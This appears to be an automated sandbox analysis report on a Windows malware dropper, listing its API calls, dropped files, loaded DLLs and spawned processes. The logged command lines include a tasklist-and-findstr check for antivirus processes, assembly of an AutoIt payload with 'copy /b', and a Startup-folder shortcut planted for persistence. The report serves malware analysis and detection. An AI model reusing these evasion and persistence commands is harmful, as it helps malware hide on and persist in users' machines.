Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00194830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_00084830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00194632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\PkContent.exe; Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_001AD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_0009D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00184254 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00178F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\PkContent.exe; Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code function: 12_2_00185778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code function: 18_2_00075778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\PkContent.exe; File created: C:\Windows\PgJune
Source: C:\Users\user\Desktop\PkContent.exe; File created: C:\Windows\ReceptorsTeeth
Source: C:\Users\user\Desktop\PkContent.exe; File created: C:\Windows\PorcelainExhaust
Source: C:\Users\user\Desktop\PkContent.exe; File created: C:\Windows\MonsterRaymond
Source: C:\Users\user\Desktop\PkContent.exe; File created: C:\Windows\FirewireBros
Source: C:\Users\user\Desktop\PkContent.exe; File created: C:\Windows\PortugalCharges
Source: C:\Users\user\Desktop\PkContent.exe; Code functions: 0_2_0040497C, 0_2_00406ED2, 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif; Code functions: 12_2_0012B020, 12_2_001294E0, 12_2_00129C80, 12_2_001423F5, 12_2_001A8400, 12_2_00156502, 12_2_0015265E, 12_2_0012E6F0, 12_2_0014282A, 12_2_001589BF, 12_2_001A0A3A, 12_2_00156A74, 12_2_00130BE0, 12_2_0014CD51, 12_2_0017EDB2, 12_2_00188E44, 12_2_001A0EB7, 12_2_00156FE6, 12_2_001433B7, 12_2_0014F409, 12_2_0013D45D, 12_2_0013F628, 12_2_00121663, 12_2_001416B4, 12_2_0012F6A0, 12_2_001478C3, 12_2_0014DBA5, 12_2_00141BA8, 12_2_00159CE5, 12_2_0013DD28, 12_2_0014BFD6, 12_2_00141FC0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr; Code functions: 18_2_0001B020, 18_2_000194E0, 18_2_00019C80, 18_2_000323F5, 18_2_00098400, 18_2_00046502, 18_2_0004265E, 18_2_0001E6F0, 18_2_0003282A, 18_2_000489BF, 18_2_00090A3A, 18_2_00046A74, 18_2_00020BE0, 18_2_0003CD51, 18_2_0006EDB2, 18_2_00078E44, 18_2_00090EB7, 18_2_00046FE6, 18_2_000333B7, 18_2_0003F409, 18_2_0002D45D, 18_2_0002F628, 18_2_00011663, 18_2_0001F6A0, 18_2_000316B4, 18_2_000378C3, 18_2_0003DBA5, 18_2_00031BA8, 18_2_00049CE5, 18_2_0002DD28, 18_2_00031FC0, 18_2_0003BFD6
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\Desktop\PkContent.exe | Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: String function: 00038B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: String function: 00030D17 appears 70 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: String function: 00021A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: String function: 00140D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: String function: 00131A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: String function: 00148B30 appears 42 times
Source: PkContent.exe, 00000000.00000002.1318641163.00000000006C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs PkContent.exe
Source: PkContent.exe, 00000000.00000003.1317774847.00000000006C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs PkContent.exe
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs PkContent.exe
Source: PkContent.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal92.expl.evad.winEXE@28/14@3/0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018A6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00178DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00179399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_00068DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_00069399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00184148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | File created: C:\Users\user\AppData\Local\GuardKey Solutions
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:788:120:WilError_03
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsx6D5D.tmp
Source: C:\Users\user\Desktop\PkContent.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: PkContent.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\PkContent.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PkContent.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PkContent.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\PkContent.exe | File read: C:\Users\user\Desktop\PkContent.exe
Source: unknown | Process created: C:\Users\user\Desktop\PkContent.exe "C:\Users\user\Desktop\PkContent.exe"
Source: C:\Users\user\Desktop\PkContent.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif y
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\PkContent.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PkContent.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: PkContent.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00148B75 push ecx; ret 12_2_00148B88
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_00038B75 push ecx; ret 18_2_00038B88

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | File created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_001A59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00135EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_000959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 18_2_00025EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_001433B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\PkContent.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | API coverage: 4.6 %
Source: C:\Windows\SysWOW64\findstr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\findstr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00184005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_00183CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 12_2_0018CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
